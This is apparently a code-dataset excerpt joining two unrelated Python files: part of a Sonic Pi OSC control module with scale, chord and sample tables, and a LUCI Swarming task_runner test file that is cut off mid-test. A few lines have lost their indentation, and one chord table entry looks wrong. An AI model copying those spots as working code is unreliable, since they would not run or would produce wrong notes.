'spanish': [1, 3, 1, 2, 1, 2, 2],
'prometheus': [2, 2, 2, 5, 1],
'diminished': [1, 2, 1, 2, 1, 2, 1, 2],
'todi': [1, 2, 3, 1, 1, 3, 1],
'leading_whole': [2, 2, 2, 2, 2, 1, 1],
'augmented': [3, 1, 3, 1, 3, 1],
'purvi': [1, 3, 2, 1, 1, 3, 1],
'chinese': [4, 2, 1, 4, 1],
'lydian_minor': [2, 2, 2, 1, 1, 2, 2],
'i': _ionian_sequence,
'ii': _ionian_sequence[1:] + _ionian_sequence[:1], # rotate(1)
'iii': _ionian_sequence[2:] + _ionian_sequence[:2], # rotate(2)
'iv': _ionian_sequence[3:] + _ionian_sequence[:3], # rotate(3)
'v': _ionian_sequence[4:] + _ionian_sequence[:4], # rotate(4)
'vi': _ionian_sequence[5:] + _ionian_sequence[:5], # rotate(5)
'vii': _ionian_sequence[6:] + _ionian_sequence[:6], # rotate(6),
'viii': _ionian_sequence[7:] + _ionian_sequence[:7]} # rotate(7)
## Chord Quality (from sonic pi) ##
MAJOR7 = "major7"
DOM7 = "dom7"
MINOR7 = "minor7"
AUG = "aug"
DIM = "dim"
DIM7 = "dim7"
_CHORD_QUALITY = {
'major': [0, 4, 7],
'minor': [0, 3, 7],
'major7': [0, 4, 7, 11],
'dom7': [0, 4, 7, 10],
'minor7': [0, 3, 7, 10],
'aug': [0, 4, 8],
'dim': [0, 3, 6],
'dim7': [0, 3, 6, 9],
'1': [0],
"5": [0, 7],
"+5": [0, 4, 8],
"m+5": [0, 3, 8],
"sus2": [0, 2, 7],
"sus4": [0, 5, 7],
"6": [0, 4, 7, 9],
"m6": [0, 3, 7, 9],
"7sus2": [0, 2, 7, 10],
"7sus4": [0, 5, 7, 10],
"7-5": [0, 4, 6, 10],
"m7-5": [0, 3, 6, 10],
"7+5": [0, 4, 8, 10],
"m7+5": [0, 3, 8, 10],
"9": [0, 4, 7, 10, 14],
"m9": [0, 3, 7, 10, 14],
"m7+9": [0, 3, 7, 10, 14],
"maj9": [0, 4, 7, 11, 14],
"9sus4": [0, 5, 7, 10, 14],
"6*9": [0, 4, 7, 9, 14],
"m6*9": [0, 3, 9, 7, 14],
"7-9": [0, 4, 7, 10, 13],
"m7-9": [0, 3, 7, 10, 13],
"7-10": [0, 4, 7, 10, 15],
"9+5": [0, 10, 13],
"m9+5": [0, 10, 14],
"7+5-9": [0, 4, 8, 10, 13],
"m7+5-9": [0, 3, 8, 10, 13],
"11": [0, 4, 7, 10, 14, 17],
"m11": [0, 3, 7, 10, 14, 17],
"maj11": [0, 4, 7, 11, 14, 17],
"11+": [0, 4, 7, 10, 14, 18],
"m11+": [0, 3, 7, 10, 14, 18],
"13": [0, 4, 7, 10, 14, 17, 21],
"m13": [0, 3, 7, 10, 14, 17, 21],
"M": [0, 4, 7],
"m": [0, 3, 7],
"7": [0, 4, 7, 10],
"M7": [0, 4, 7, 11],
"m7": [0, 3, 7],
"augmented": [0, 4, 8],
"a": [0, 4, 8],
"diminished": [0, 3, 6],
"i": [0, 3, 6],
"diminished7": [0, 3, 6, 9],
"i7": [0, 3, 6, 9]}
## Sample ##
## Drum Sounds
DRUM_HEAVY_KICK = Sample('drum_heavy_kick')
DRUM_TOM_MID_SOFT = Sample('drum_tom_mid_soft')
DRUM_TOM_MID_HARD = Sample('drum_tom_mid_hard')
DRUM_TOM_LO_SOFT = Sample('drum_tom_lo_soft')
DRUM_TOM_LO_HARD = Sample('drum_tom_lo_hard')
DRUM_TOM_HI_SOFT = Sample('drum_tom_hi_soft')
DRUM_TOM_HI_HARD = Sample('drum_tom_hi_hard')
DRUM_SPLASH_SOFT = Sample('drum_splash_soft')
DRUM_SPLASH_HARD = Sample('drum_splash_hard')
DRUM_SNARE_SOFT = Sample('drum_snare_soft')
DRUM_SNARE_HARD = Sample('drum_snare_hard')
DRUM_CYMBAL_SOFT = Sample('drum_cymbal_soft')
DRUM_CYMBAL_HARD = Sample('drum_cymbal_hard')
DRUM_CYMBAL_OPEN = Sample('drum_cymbal_open')
DRUM_CYMBAL_CLOSED = Sample('drum_cymbal_closed')
DRUM_CYMBAL_PEDAL = Sample('drum_cymbal_pedal')
DRUM_BASS_SOFT = Sample('drum_bass_soft')
DRUM_BASS_HARD = Sample('drum_bass_hard')
DRUM_COWBELL = Sample('drum_cowbell')
DRUM_ROLL = Sample('drum_roll')
## Electric Sounds
ELEC_TRIANGLE = Sample('elec_triangle')
ELEC_SNARE = Sample('elec_snare')
ELEC_LO_SNARE = Sample('elec_lo_snare')
ELEC_HI_SNARE = Sample('elec_hi_snare')
ELEC_MID_SNARE = Sample('elec_mid_snare')
ELEC_CYMBAL = Sample('elec_cymbal')
ELEC_SOFT_KICK = Sample('elec_soft_kick')
ELEC_FILT_SNARE = Sample('elec_filt_snare')
ELEC_FUZZ_TOM = Sample('elec_fuzz_tom')
ELEC_CHIME = Sample('elec_chime')
ELEC_BONG = Sample('elec_bong')
ELEC_TWANG = Sample('elec_twang')
ELEC_WOOD = Sample('elec_wood')
ELEC_POP = Sample('elec_pop')
ELEC_BEEP = Sample('elec_beep')
ELEC_BLIP = Sample('elec_blip')
ELEC_BLIP2 = Sample('elec_blip2')
ELEC_PING = Sample('elec_ping')
ELEC_BELL = Sample('elec_bell')
ELEC_FLIP = Sample('elec_flip')
ELEC_TICK = Sample('elec_tick')
ELEC_HOLLOW_KICK = Sample('elec_hollow_kick')
ELEC_TWIP = Sample('elec_twip')
ELEC_PLIP = Sample('elec_plip')
ELEC_BLUP = Sample('elec_blup')
## Sounds featuring guitars
GUIT_HARMONICS = Sample('guit_harmonics')
GUIT_E_FIFTHS = Sample('guit_e_fifths')
GUIT_E_SLIDE = Sample('guit_e_slide')
## Miscellaneous Sounds
MISC_BURP = Sample('misc_burp')
MISC_CROW = Sample('misc_crow')
MISC_CINEBOOM = Sample('misc_cineboom')
## Percussive Sounds
PERC_BELL = Sample('perc_bell')
PERC_SWASH = Sample('perc_swash')
PERC_TILL = Sample('perc_till')
## Ambient Sounds
AMBI_SOFT_BUZZ = Sample('ambi_soft_buzz')
AMBI_SWOOSH = Sample('ambi_swoosh')
AMBI_DRONE = Sample('ambi_drone')
AMBI_GLASS_HUM = Sample('ambi_glass_hum')
AMBI_GLASS_RUB = Sample('ambi_glass_rub')
AMBI_HAUNTED_HUM = Sample('ambi_haunted_hum')
AMBI_PIANO = Sample('ambi_piano')
AMBI_LUNAR_LAND = Sample('ambi_lunar_land')
AMBI_DARK_WOOSH = Sample('ambi_dark_woosh')
AMBI_CHOIR = Sample('ambi_choir')
## Bass Sounds
BASS_HIT_C = Sample('bass_hit_c')
BASS_HARD_C = Sample('bass_hard_c')
BASS_THICK_C = Sample('bass_thick_c')
BASS_DROP_C = Sample('bass_drop_c')
BASS_WOODSY_C = Sample('bass_woodsy_c')
BASS_VOXY_C = Sample('bass_voxy_c')
BASS_VOXY_HIT_C = Sample('bass_voxy_hit_c')
BASS_DNB_F = Sample('bass_dnb_f')
BD_808 = Sample('bd_808')
BD_ADA = Sample('bd_ada')
BD_BOOM = Sample('bd_boom')
BD_FAT = Sample('bd_fat')
BD_GAS = Sample('bd_gas')
BD_HAUS = Sample('bd_haus')
BD_KLUB = Sample('bd_klub')
BD_PURE = Sample('bd_pure')
BD_SONE = Sample('bd_sone')
BD_TEK = Sample('bd_tek')
BD_ZOME = Sample('bd_zome')
BD_ZUM = Sample('bd_zum')
## Sounds for Looping
LOOP_INDUSTRIAL = Sample('loop_industrial')
LOOP_COMPUS = Sample('loop_compus')
LOOP_AMEN = Sample('loop_amen')
LOOP_AMEN_FULL = Sample('loop_amen_full')
LOOP_SAFARI = Sample('loop_safari')
LOOP_TABLA = Sample('loop_tabla')
## Tabla
TABLA_TAS1 = Sample('tabla_tas1')
TABLA_TAS2 = Sample('tabla_tas2')
TABLA_TAS3 = Sample('tabla_tas3')
TABLA_KE1 = Sample('tabla_ke1')
TABLA_KE2 = Sample('tabla_ke2')
TABLA_KE3 = Sample('tabla_ke3')
TABLA_NA = Sample('tabla_na')
TABLA_NA_O = Sample('tabla_na_o')
TABLA_TUN1 = Sample('tabla_tun1')
TABLA_TUN2 = Sample('tabla_tun2')
TABLA_TUN3 = Sample('tabla_tun3')
TABLA_TE1 = Sample('tabla_te1')
TABLA_TE2 = Sample('tabla_te2')
TABLA_TE_NE = Sample('tabla_te_ne')
TABLA_TE_M = Sample('tabla_te_m')
TABLA_GHE1 = Sample('tabla_ghe1')
TABLA_GHE2 = Sample('tabla_ghe2')
TABLA_GHE3 = Sample('tabla_ghe3')
TABLA_GHE4 = Sample('tabla_ghe4')
TABLA_GHE5 = Sample('tabla_ghe5')
TABLA_GHE6 = Sample('tabla_ghe6')
TABLA_GHE7 = Sample('tabla_ghe7')
TABLA_GHE8 = Sample('tabla_ghe8')
TABLA_DHEC = Sample('tabla_dhec')
TABLA_NA_S = Sample('tabla_na_s')
TABLA_RE = Sample('tabla_re')
# Vinyl
VINYL_BACKSPIN = Sample('vinyl_backspin')
VINYL_REWIND = Sample('vinyl_rewind')
VINYL_SCRATCH = Sample('vinyl_scratch')
VINYL_HISS = Sample('vinyl_hiss')
## FX
BITCRUSHER = FxName('bitcrusher')
COMPRESSOR = FxName('compressor')
ECHO = FxName('echo')
FLANGER = FxName('flanger')
KRUSH = FxName('krush')
LPF = FxName('lpf')
PAN = FxName('pan')
PANSLICER = FxName('panslicer')
REVERB = FxName('reverb')
SLICER = FxName('slicer')
WOBBLE = FxName('wobble')
## Module attributes ##
_current_synth = BEEP
## Module methods ##
def use_synth(synth):
    """
    Select the synthesizer used by subsequent play() calls.

    :param synth: a Synth instance (e.g. SAW, TB303)
    :return: None
    """
    global _current_synth
    _current_synth = synth
def synth(name, note=None, attack=None, decay=None, sustain_level=None, sustain=None, release=None, cutoff=None,
          cutoff_attack=None, amp=None, pan=None):
    """
    Trigger a synth by name, forwarding every parameter that was set.

    :param name: a Synth instance (its .name is used in the command)
    :return: None
    """
    # (label, value) pairs in the exact order the command has always used.
    opts = (('note', note), ('attack', attack), ('cutoff_attack', cutoff_attack),
            ('decay', decay), ('sustain_level', sustain_level), ('sustain', sustain),
            ('release', release), ('cutoff', cutoff), ('amp', amp), ('pan', pan))
    fragments = ['{0}: {1}'.format(label, value) for label, value in opts if value is not None]
    parameter = ',' + ','.join(fragments) if fragments else ''
    command = 'synth :{0}{1}'.format(name.name, parameter)
    _debug('synth command={}'.format(command))
    synth_server.synth(command)
def play(note, attack=None, decay=None, sustain_level=None, sustain=None, release=None, cutoff=None,
         cutoff_attack=None, amp=None, pan=None):
    """
    Play a note on the currently selected synth, forwarding set parameters.

    :param note: MIDI note number (e.g. C4 == 60)
    :return: None
    """
    # (label, value) pairs in the exact order the command has always used.
    opts = (('attack', attack), ('cutoff_attack', cutoff_attack), ('decay', decay),
            ('sustain_level', sustain_level), ('sustain', sustain), ('release', release),
            ('cutoff', cutoff), ('amp', amp), ('pan', pan))
    fragments = ['{0}: {1}'.format(label, value) for label, value in opts if value is not None]
    parameter = ',' + ','.join(fragments) if fragments else ''
    command = 'play {0}{1}'.format(note, parameter)
    _debug('play command={}'.format(command))
    synth_server.play(command)
def play_pattern_timed(notes, times, release=None):
    """
    Play notes with pauses between them.

    For every duration in *times*, the whole *notes* list is played with
    that pause after each note.

    NOTE(review): Sonic Pi's play_pattern_timed cycles *times* per note
    rather than replaying the full note list once per duration -- confirm
    this loop nesting is intended before relying on it.

    :param notes: a note (int) or list of notes
    :param times: a pause in seconds or list of pauses
    :param release: optional release time forwarded to play()
    :return: None
    """
    if not type(notes) is list: notes = [notes]
    if not type(times) is list: times = [times]
    for t in times:
        for i in notes:
            play(i, release=release)
            sleep(t)
def play_pattern(notes):
    """
    Play all notes with a fixed one-second pause between them.

    :param notes: a note (int) or list of notes
    :return: None
    """
    play_pattern_timed(notes, 1)
def sample(sample, rate=None, attack=None, sustain=None, release=None, beat_stretch=None,
           start=None, finish=None, amp=None, pan=None):
    """
    Trigger a sample, forwarding every parameter that was set.

    :param sample: a Sample instance (built-in sample) or a string treated
        as a path / raw sample name
    :return: None
    """
    parameters = []
    parameter = ''
    command = ''
    if rate is not None: parameters.append('rate: {0}'.format(rate))
    if attack is not None: parameters.append('attack: {0}'.format(attack))
    if sustain is not None: parameters.append('sustain: {0}'.format(sustain))
    if release is not None: parameters.append('release: {0}'.format(release))
    if beat_stretch is not None: parameters.append('beat_stretch: {0}'.format(beat_stretch))
    if start is not None: parameters.append('start: {0}'.format(start))
    if finish is not None: parameters.append('finish: {0}'.format(finish))
    if amp is not None: parameters.append('amp: {0}'.format(amp))
    if pan is not None: parameters.append('pan: {0}'.format(pan))
    if len(parameters) > 0: parameter = ',' + ','.join(parameters)
    # isinstance() is the idiomatic check and also accepts Sample subclasses,
    # unlike the original `type(sample) == Sample` comparison.
    if isinstance(sample, Sample):
        command = 'sample :{0}{1}'.format(sample.name, parameter)
    else:
        # Anything else is interpreted as a quoted sample path string.
        command = 'sample "{0}"{1}'.format(sample, parameter)
    _debug('sample command={}'.format(command))
    synth_server.sample(command)
def sleep(duration):
    """
    Pause for *duration* seconds via the active synth server
    (the same as time.sleep for the default SonicPi server).

    :param duration: seconds to pause
    :return: None
    """
    synth_server.sleep(duration)
    _debug('sleep', duration)
def one_in(max):
    """
    Return True in one out of *max* equally likely cases.

    :param max: number of equally likely cases
    :return: boolean
    """
    # randint is inclusive on both ends, so 1..max has exactly `max` outcomes.
    pick = random.randint(1, max)
    return pick == 1
def chord(root_note, chord_quality):
    """
    Generate the list of MIDI notes of a chord.

    :param root_note: MIDI note number of the root
    :param chord_quality: key into _CHORD_QUALITY (e.g. 'major', 'm7')
    :return: list of MIDI note numbers
    """
    # _CHORD_QUALITY stores absolute half-tone offsets from the root
    # (e.g. 'major' -> [0, 4, 7]).  The original loop accumulated them as
    # successive steps, producing e.g. [root, root+4, root+11] for a major
    # chord; each offset must instead be added directly to the root.
    half_tone_offsets = _CHORD_QUALITY[chord_quality]
    return [root_note + offset for offset in half_tone_offsets]
def scale(root_note, scale_mode, num_octaves=1):
    """
    Generate a list of the notes of a scale.

    :param root_note: MIDI note number of the root
    :param scale_mode: key into _SCALE_MODE (e.g. MAJOR, MINOR)
    :param num_octaves: how many octaves the scale spans
    :return: list of MIDI note numbers
    """
    half_tone_steps = _SCALE_MODE[scale_mode]
    result = [root_note]
    n = root_note
    # Every mode's steps sum to 12, so each pass ends one octave higher.
    for _ in range(num_octaves):
        for step in half_tone_steps:
            n += step
            result.append(n)
    # Bug fix: the original re-appended the octave boundary note at the
    # start of every octave after the first, duplicating it; this version
    # emits each boundary note exactly once.
    return result
def run(command):
    """Run raw Sonic Pi code on the server."""
    synth_server.run(command)
def stop():
    """Stop all jobs currently running on the Sonic Pi server."""
    synth_server.stop()
def send_message(message, *parameter):
    """Send an OSC message with the given address and arguments."""
    synth_server.send_message(message, *parameter)
## Compound classes ##
class Ring:
    """
    Endless iterator over a fixed list: after the last element the
    iteration wraps back to the first one.
    """

    def __init__(self, data):
        self.data = data
        self.index = -1  # so the first __next__ yields data[0]

    def __iter__(self):
        # The Ring is its own iterator; it never raises StopIteration.
        return self

    def __next__(self):
        nxt = self.index + 1
        if nxt == len(self.data):
            nxt = 0
        self.index = nxt
        return self.data[nxt]

    def choose(self):
        """Return a random element of the ring."""
        return random.choice(self.data)
## Connection classes ##
class SonicPi:
    """
    OSC communication with a running Sonic Pi server.
    """
    UDP_IP = "127.0.0.1"
    UDP_PORT = 4557               # command port (run/stop)
    UDP_PORT_OSC_MESSAGE = 4559   # port for user OSC messages
    GUI_ID = 'SONIC_PI_PYTHON'
    RUN_COMMAND = "/run-code"
    STOP_COMMAND = "/stop-all-jobs"

    def __init__(self):
        self.client = udp_client.UDPClient(SonicPi.UDP_IP, SonicPi.UDP_PORT)
        self.client_for_messages = udp_client.UDPClient(SonicPi.UDP_IP, SonicPi.UDP_PORT_OSC_MESSAGE)

    def sample(self, command):
        self.run(command)

    def play(self, command):
        # Prefix with the currently selected synth so play() honours use_synth().
        command = 'use_synth :{0}\n'.format(_current_synth.name) + command
        self.run(command)

    def synth(self, command):
        self.run(command)

    def sleep(self, duration):
        time.sleep(duration)

    def run(self, command):
        self.send_command(SonicPi.RUN_COMMAND, command)

    def stop(self):
        self.send_command(SonicPi.STOP_COMMAND)

    def test_connection(self):
        # TODO: actually verify that Sonic Pi is listening on UDP_PORT.
        pass

    def send_command(self, address, argument=''):
        """Send a GUI command (tagged with GUI_ID) to the Sonic Pi server."""
        msg = osc_message_builder.OscMessageBuilder(address=address)
        # Consistency fix: use the GUI_ID constant instead of repeating the
        # literal string (identical value, single source of truth).
        msg.add_arg(SonicPi.GUI_ID)
        if argument != "":
            msg.add_arg(argument)
        self.client.send(msg.build())

    def send_message(self, message, *parameters):
        """Send an arbitrary OSC message on the message port."""
        msg = osc_message_builder.OscMessageBuilder(message)
        for p in parameters:
            msg.add_arg(p)
        self.client_for_messages.send(msg.build())
class SonicPiNew:
    """
    Communication with Sonic Pi via OSC cues on port 4559.
    """
    UDP_IP = "127.0.0.1"
    UDP_PORT = 4559
    def __init__(self):
        self.client = udp_client.UDPClient(SonicPiNew.UDP_IP, SonicPiNew.UDP_PORT)
        # A classic SonicPi client is still needed to install code on the
        # server (e.g. a live_loop that reacts to our OSC cues).
        self.commandServer = SonicPi()
        # x= 'live_loop :py do\n nv=sync "/SENDOSC"\n puts nv\n eval(nv[0])\nend'
        # self.commandServer.run(x)
    def set_OSC_receiver(self, source):
        """Install Sonic Pi code (e.g. a live_loop) that listens for our cues."""
        self.commandServer.run(source)
    def send(self, address, *message):
        """Send an OSC message with the given address and arguments."""
        msg = osc_message_builder.OscMessageBuilder(address)
        for m in message:
            msg.add_arg(m)
        msg = msg.build()
        self.client.send(msg)
    def sample(self, command):
        # NOTE(review): forwards only the address with no arguments -- confirm
        # the receiving live_loop expects a bare cue here.
        self.send(command)
    def play(self, command):
        self.send(command)
    def sleep(self, duration):
        # Plain time.sleep; no server-side scheduling is involved.
        time.sleep(duration)
synth_server = SonicPi()
## system functions ##
def _debug(*allargs):  # simple debug function for working in different environments
    """Print the arguments when the module-level __debug flag is True."""
    if __debug: print(allargs)
if __name__ == '__main__':
use_synth(SAW)
play(C5, amp=2, pan=-1)
|
task_runner_test.py | #!/usr/bin/env vpython3
# coding=utf-8
# Copyright 2013 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
from __future__ import print_function
import base64
import datetime
import fnmatch
import json
import logging
import os
import random
import re
import signal
import string
import sys
import tempfile
import threading
import time
import unittest
import mock
import six
import test_env_bot_code
test_env_bot_code.setup_test_env()
CLIENT_DIR = os.path.normpath(
os.path.join(test_env_bot_code.BOT_DIR, '..', '..', '..', 'client'))
# Needed for local_caching, and others on Windows when symlinks are not enabled.
sys.path.insert(0, CLIENT_DIR)
# Needed for isolateserver_fake.
sys.path.insert(0, os.path.join(CLIENT_DIR, 'tests'))
from bot_code import bot_auth
from bot_code import remote_client
from bot_code import task_runner
from depot_tools import auto_stub
from depot_tools import fix_encoding
from libs import luci_context
from utils import file_path
from utils import fs
from utils import large
from utils import logging_utils
from utils import subprocess42
from utils import tools
import isolateserver_fake
import local_caching
import swarmingserver_bot_fake
def to_native_eol(s):
  """Returns *s* with LF converted to the native EOL: CRLF on Windows under
  Python 3, unchanged everywhere else."""
  needs_crlf = six.PY3 and sys.platform == 'win32'
  return s.replace('\n', '\r\n') if needs_crlf else s
def gen_task_id():
  """Returns a pseudo-random 10-digit task id string."""
  return ''.join(random.choice(string.digits) for _ in range(10))
DISABLE_CIPD_FOR_TESTS = ['--cipd-enabled', 'false']
EXIT_CODE_TERM = -signal.SIGTERM
# Actually 0xc000013a, unsigned in python3 on windows
if sys.platform == 'win32':
if six.PY3:
EXIT_CODE_TERM = 3221225786
else:
EXIT_CODE_TERM = -1073741510
def get_manifest(script=None, isolated=None, **kwargs):
  """Returns a task manifest similar to what the server sends back to the bot.

  Eventually this should be a proto message.
  """
  isolated_input = isolated and isolated.get('input')
  # A command is only present for non-isolated tasks.
  command = None
  if not isolated_input:
    command = [sys.executable, '-u', '-c', script]
  out = {
      'bot_authenticated_as': 'foo',
      'bot_id': 'localhost',
      'caches': [],
      'cipd_input': {},
      'command': command,
      'containment': {
          'lower_priority': True,
          'containment_type': 'NONE',
          'limit_processes': 0,
          'limit_total_committed_memory': 0,
      },
      'dimensions': {},
      'env': {},
      'env_prefixes': {},
      'grace_period': 30.,
      'hard_timeout': 10.,
      'host': 'bar',
      'io_timeout': 10.,
      'isolated': isolated,
      'cas_input_root': None,
      'outputs': [],
      'realm': None,
      'relative_cwd': None,
      'resultdb': None,
      'secret_bytes': None,
      'service_accounts': None,
      'task_id': six.text_type(gen_task_id()),
  }
  # Caller-supplied overrides win over the defaults above.
  out.update(kwargs)
  return out
def get_task_details(*args, **kwargs):
  """Builds a task_runner.TaskDetails from a get_manifest() manifest."""
  return task_runner.TaskDetails(get_manifest(*args, **kwargs))
def run_command(server_url, work_dir, task_details, headers_cb):
  """Runs a command with an initialized client."""
  remote = remote_client.createRemoteClient(server_url, headers_cb, 'localhost',
                                            work_dir)
  remote.bot_id = task_details.bot_id
  # Stage an empty LUCI_CONTEXT (no local auth) for the duration of the task.
  with luci_context.stage(local_auth=None) as ctx_file:
    return task_runner.run_command(remote, task_details, work_dir, 3600.,
                                   time.time(), ['--min-free-space', '1'] +
                                   DISABLE_CIPD_FOR_TESTS, '/path/to/file',
                                   ctx_file)
def load_and_run(server_url, work_dir, manifest, auth_params_file):
  """Wraps task_runner.load_and_run() which runs a Swarming task.

  Writes the manifest to task_runner's input file, runs the task, and
  returns the parsed JSON result that task_runner wrote to its output file.
  """
  in_file = os.path.join(work_dir, 'task_runner_in.json')
  with open(in_file, 'w') as f:
    json.dump(manifest, f)
  out_file = os.path.join(work_dir, 'task_runner_out.json')
  task_runner.load_and_run(in_file, server_url, 3600., time.time(), out_file,
                           ['--min-free-space', '1'] + DISABLE_CIPD_FOR_TESTS,
                           None, auth_params_file)
  with open(out_file, 'rb') as f:
    return json.load(f)
class FakeAuthSystem(object):
  """Test double for bot_auth.AuthSystem returning canned headers."""

  # Tests may override this class attribute to simulate a LUCI local auth
  # context; None means "no local auth".
  local_auth_context = None

  def __init__(self, auth_params_file):
    self._running = False
    # The tests always pass this exact path; anything else is a wiring bug.
    assert auth_params_file == '/path/to/auth-params-file'

  def set_remote_client(self, _remote_client):
    # The real AuthSystem needs the remote client; the fake ignores it.
    pass

  def start(self):
    """Marks the system started and returns the local auth context (or None)."""
    assert not self._running
    self._running = True
    return self.local_auth_context

  def stop(self):
    self._running = False

  def get_bot_headers(self):
    """Returns (headers dict, expiration as a unix timestamp)."""
    assert self._running
    return {'Fake': 'Header'}, int(time.time() + 300)
class TestTaskRunnerBase(auto_stub.TestCase):
  """Base fixture for task_runner tests: a temporary work directory plus
  lazily started fake Swarming and isolate servers."""

  def setUp(self):
    super(TestTaskRunnerBase, self).setUp()
    tools.clear_cache_all()
    # Each test case runs inside its own temporary root directory.
    self.root_dir = six.ensure_text(tempfile.mkdtemp(prefix=u'task_runner'))
    self.work_dir = os.path.join(self.root_dir, u'w')
    # Create the logs directory so run_isolated.py can put its log there.
    self.logs_dir = os.path.join(self.root_dir, u'logs')
    os.chdir(self.root_dir)
    os.mkdir(self.work_dir)
    os.mkdir(self.logs_dir)
    logging.info('Temp: %s', self.root_dir)
    # Mock this since swarming_bot.zip is not accessible.
    def _get_run_isolated():
      return [sys.executable, '-u', os.path.join(CLIENT_DIR, 'run_isolated.py')]
    self.mock(task_runner, 'get_run_isolated', _get_run_isolated)
    # In case this test itself is running on Swarming, clear the bot
    # environment.
    os.environ.pop('LUCI_CONTEXT', None)
    os.environ.pop('SWARMING_AUTH_PARAMS', None)
    os.environ.pop('SWARMING_BOT_ID', None)
    os.environ.pop('SWARMING_TASK_ID', None)
    os.environ.pop('SWARMING_SERVER', None)
    os.environ.pop('ISOLATE_SERVER', None)
    # Make HTTP headers consistent
    self.mock(remote_client, 'make_appengine_id', lambda *a: 42)
    # Fake servers are created lazily by the properties below.
    self._server = None
    self._isolateserver = None

  def tearDown(self):
    # Leave the temp dir before deleting it (required on Windows).
    os.chdir(test_env_bot_code.BOT_DIR)
    try:
      try:
        if self._server:
          self._server.close()
      finally:
        # Dump the collected logs to ease debugging before deleting them.
        logging.debug(self.logs_dir)
        for i in os.listdir(self.logs_dir):
          with open(os.path.join(self.logs_dir, i), 'r') as f:
            logging.debug('%s:\n%s', i, ''.join(' ' + line for line in f))
        file_path.rmtree(self.root_dir)
    except OSError:
      print('Failed to delete %s' % self.root_dir, file=sys.stderr)
      raise
    finally:
      super(TestTaskRunnerBase, self).tearDown()

  @property
  def server(self):
    """Lazily starts a Swarming fake bot API server."""
    if not self._server:
      self._server = swarmingserver_bot_fake.Server()
    return self._server

  @property
  def isolateserver(self):
    """Lazily starts an isolate fake API server."""
    if not self._isolateserver:
      self._isolateserver = isolateserver_fake.FakeIsolateServer()
    return self._isolateserver

  def getTaskResults(self, task_id):
    """Returns a flattened task result."""
    tasks = self.server.get_tasks()
    # The server must have seen exactly this one task.
    self.assertEqual([task_id], sorted(tasks))
    actual = swarmingserver_bot_fake.flatten_task_updates(tasks[task_id])
    # Always decode the output;
    if u'output' in actual:
      actual[u'output'] = base64.b64decode(actual[u'output'])
    return actual

  def expectTask(self, task_id, **kwargs):
    """Asserts the task update sent by task_runner to the server.

    It doesn't disambiguate individual task_update, so if you care about the
    individual packets (like internal timeouts), check them separately.

    Keyword overrides replace the default expectations below; a value of
    None removes the key from the expectations entirely.

    Returns:
      flattened task result as seen on the server, with output decoded.
    """
    actual = self.getTaskResults(task_id)
    out = actual.copy()
    expected = {
        u'bot_overhead': 0.,
        u'cost_usd': 0.,
        u'duration': 0.,
        u'exit_code': 0,
        u'hard_timeout': False,
        u'id': u'localhost',
        u'io_timeout': False,
        u'isolated_stats': {
            u'download': {
                u'initial_number_items': 0,
                u'initial_size': 0,
            },
        },
        u'output': to_native_eol('hi\n').encode(),
        u'output_chunk_start': 0,
        u'task_id': task_id,
    }
    for k, v in kwargs.items():
      if v is None:
        expected.pop(k)
      else:
        expected[six.ensure_text(k)] = v
    # Use explicit <= verification for these.
    for k in (u'bot_overhead', u'cost_usd', u'duration'):
      # Actual values must be equal or larger than the expected values.
      if k in actual:
        self.assertLessEqual(expected.pop(k), actual.pop(k))
    # Use regexp if requested.
    if hasattr(expected[u'output'], 'pattern'):
      v = actual.pop(u'output')
      r = expected.pop(u'output')
      self.assertTrue(
          r.match(v),
          "failed to match output. pattern: %s, actual: %s" % (r.pattern, v))
    for key, value in expected.get(u'isolated_stats', {}).items():
      if 'isolated_stats' not in actual:
        # expected but not actual.
        break
      if u'duration' in value:
        v = actual[u'isolated_stats'][key].pop(u'duration')
        self.assertLessEqual(value.pop(u'duration'), v)
    # drop duration stats.
    actual.pop(u'cache_trim_stats', None)
    actual.pop(u'named_caches_stats', None)
    actual.pop(u'cleanup_stats', None)
    # Rest is explicit comparison.
    self.assertEqual(expected, actual)
    return out

  def _run_command(self, task_details):
    # Helper so individual tests don't repeat the server URL plumbing.
    return run_command(self.server.url, self.work_dir, task_details, None)
class TestTaskRunner(TestTaskRunnerBase):
  # Test cases that do not involve a timeout.
  # These test cases run the command for real.
  def _expect_files(self, expected):
    """Asserts the set of files under root_dir matches the fnmatch patterns.

    Each file found must match exactly one pattern; each pattern must be
    consumed by exactly one file. The 'logs' directory is ignored.
    """
    # Confirm work_dir against a dict of expected files.
    expected = expected[:]
    for root, dirs, filenames in fs.walk(self.root_dir):
      if 'logs' in dirs:
        dirs.remove('logs')
      for filename in filenames:
        p = os.path.relpath(os.path.join(root, filename), self.root_dir)
        for i, e in enumerate(expected):
          if fnmatch.fnmatch(p, e):
            expected.pop(i)
            break
        else:
          self.fail((p, expected))
    if expected:
      self.fail(expected)
  def test_run_command_raw(self):
    """Runs a trivial raw command and checks the run_command() summary."""
    task_details = get_task_details('print(\'hi\')')
    expected = {
        u'exit_code': 0,
        u'hard_timeout': False,
        u'io_timeout': False,
        u'must_signal_internal_failure': None,
        u'version': task_runner.OUT_VERSION,
    }
    self.assertEqual(expected, self._run_command(task_details))
    # Now look at the updates sent by the bot as seen by the server.
    self.expectTask(task_details.task_id)
  def test_run_command_env_prefix_one(self):
    """A single env_prefixes entry must be prepended to PATH."""
    task_details = get_task_details(
        'import os\nprint(os.getenv("PATH").split(os.pathsep)[0])',
        env_prefixes={
            'PATH': ['./local/smurf', './other/thing'],
        })
    expected = {
        u'exit_code': 0,
        u'hard_timeout': False,
        u'io_timeout': False,
        u'must_signal_internal_failure': None,
        u'version': task_runner.OUT_VERSION,
    }
    self.assertEqual(expected, self._run_command(task_details))
    # Now look at the updates sent by the bot as seen by the server.
    sep = re.escape(os.sep)
    self.expectTask(
        task_details.task_id,
        output=re.compile(
            (to_native_eol('.+%slocal%ssmurf\n$') % (sep, sep)).encode()))
  def test_run_command_env_prefix_multiple(self):
    """Multiple env_prefixes entries keep their order, rooted at the cwd."""
    task_details = get_task_details(
        '\n'.join([
            'import os',
            'print(os.path.realpath(os.getcwd()))',
            'path = os.getenv("PATH").split(os.pathsep)',
            'print(os.path.realpath(path[0]))',
            'print(os.path.realpath(path[1]))',
        ]),
        env_prefixes={
            'PATH': ['./local/smurf', './other/thing'],
        })
    expected = {
        u'exit_code': 0,
        u'hard_timeout': False,
        u'io_timeout': False,
        u'must_signal_internal_failure': None,
        u'version': task_runner.OUT_VERSION,
    }
    self.assertEqual(expected, self._run_command(task_details))
    # Now look at the updates sent by the bot as seen by the server.
    sep = re.escape(os.sep)
